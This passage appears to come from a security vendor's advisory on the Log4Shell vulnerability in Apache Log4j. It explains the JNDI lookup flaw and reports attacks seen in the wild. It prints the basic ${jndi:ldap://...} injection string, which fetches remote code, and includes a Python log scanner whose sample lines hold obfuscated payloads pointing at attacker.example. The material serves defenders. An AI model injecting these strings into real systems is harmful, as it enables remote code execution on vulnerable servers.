Patch Now: Apache Log4j Vulnerability Called Log4Shell Actively Exploited
A vulnerability has been found in Apache Log4j, a widely used logging package for Java. The vulnerability, which can allow an attacker to execute arbitrary code by sending crafted log messages, has been identified as CVE-2021-44228 and given the name Log4Shell. It was first reported privately to Apache on November 24 and was patched in Log4j version 2.15.0 on December 9. It affects Apache Struts, Apache Solr, Apache Druid, Elasticsearch, Apache Dubbo, and VMware vCenter. Since then, it has been disclosed that under certain non-default configurations the original patch was incomplete; this was designated CVE-2021-45046, and a new version of Log4j, 2.16.0, has been released.
We have developed a Log4j vulnerability tester, a web-based tool that can help identify vulnerable server applications. We’ve compiled a list of our products that can help with protection and detection on our support page as well as information pertaining to our own products being vulnerable or not.
Whenever ${some_expression} appears in a logged message, Log4j's lookup mechanism evaluates the expression and replaces the placeholder with its value. Some of the lookups supported by Log4j are jndi, sys, env, java, lower, and upper. The JNDI lookup supports protocols such as LDAP, RMI, DNS, and IIOP. As discussed below, an attacker could inject JNDI expressions into logs.
For example, an attacker can do this via HTTP requests to a web server; this is currently the most common attack vector that we have seen. The lookup will then download and execute a malicious class file (malicious.class) referenced by an attacker-controlled LDAP server. In its most basic form, all the attacker has to do is plant the following expression in the logs:
${jndi:ldap://{malicious website}/a}
This will then run the malicious Java code located at http://{malicious website}/{malicious.class}.
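For defenders reviewing web server or application logs for the pattern described above, the following is an added example of detection logic; it is not code from the original post or from the Log4j project. It scans constructed sample log lines for ${jndi:...} lookups, first collapsing the nested lower and upper lookups mentioned earlier so that a lookup hidden inside them is still recognised. The hostnames are placeholders, and the normalizer only handles the two lookups named on this page, not every possible nesting.

```python
import re
from typing import List, Tuple

# Constructed sample log lines (not taken from the original post). Hostnames
# are placeholders, not real indicators. Line 3 wraps part of the lookup in a
# lower lookup to show how nesting is collapsed before matching.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.6 - - "GET / HTTP/1.1" 200 "${jndi:ldap://attacker.example/a}"',
    '10.0.0.7 - - "GET / HTTP/1.1" 200 "${${lower:J}ndi:ldap://attacker.example/a}"',
    '10.0.0.8 - - "GET / HTTP/1.1" 200 "${sys:user.home}"',
]

# Matches an innermost ${...} lookup, i.e. one whose body contains no further
# '$', '{' or '}' characters.
LOOKUP_RE = re.compile(r"\$\{([^${}]*)\}")


def normalize(text: str, max_depth: int = 10) -> str:
    """Resolve nested lower/upper lookups from the inside out.

    Each pass rewrites the innermost ${lower:x} / ${upper:x} expressions to
    their plain-text result; passes repeat until nothing changes or the depth
    limit is hit, so a deeply nested string cannot make this loop forever.
    Lookups other than lower/upper (jndi, sys, ...) are left untouched.
    """
    for _ in range(max_depth):
        changed = False

        def repl(match: "re.Match[str]") -> str:
            nonlocal changed
            key, sep, rest = match.group(1).partition(":")
            if sep and key.strip().lower() == "lower":
                changed = True
                return rest.lower()
            if sep and key.strip().lower() == "upper":
                changed = True
                return rest.upper()
            return match.group(0)

        text = LOOKUP_RE.sub(repl, text)
        if not changed:
            break
    return text


def find_jndi_lookups(line: str) -> List[str]:
    """Return every JNDI lookup expression present in a (normalized) log line."""
    normalized = normalize(line)
    return [
        m.group(0)
        for m in LOOKUP_RE.finditer(normalized)
        if m.group(1).strip().lower().startswith("jndi:")
    ]


def scan(lines: List[str]) -> List[Tuple[int, str]]:
    """Scan log lines; return (1-based line number, matched expression) pairs."""
    hits: List[Tuple[int, str]] = []
    for lineno, line in enumerate(lines, start=1):
        for expr in find_jndi_lookups(line):
            hits.append((lineno, expr))
    return hits


if __name__ == "__main__":
    for lineno, expr in scan(SAMPLE_LOG_LINES):
        print(f"line {lineno}: JNDI lookup found: {expr}")
```

A hit in access or application logs does not by itself prove compromise; it shows that an attacker-controlled string reached a point where a vulnerable Log4j instance might have logged it. Patching to 2.16.0, as the post recommends, removes the exposure regardless of what the log review finds.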
Attacks in the wild
We have observed threat actors dropping Mirai variants and Kinsing coinminers onto vulnerable servers. While some of the network traffic is simple, other threat actors are using obfuscation in the expression to hide their traffic. Examples of these can be found at the end of this entry.
Ransomware operators were also reportedly exploiting Log4Shell, particularly those behind the Khonsari ransomware family. We detect the Khonsari ransomware payload as Ransom.MSIL.KHONSARI.YXBLN.
Infection chain
Here is a possible infection flow from attacks that might exploit Log4Shell: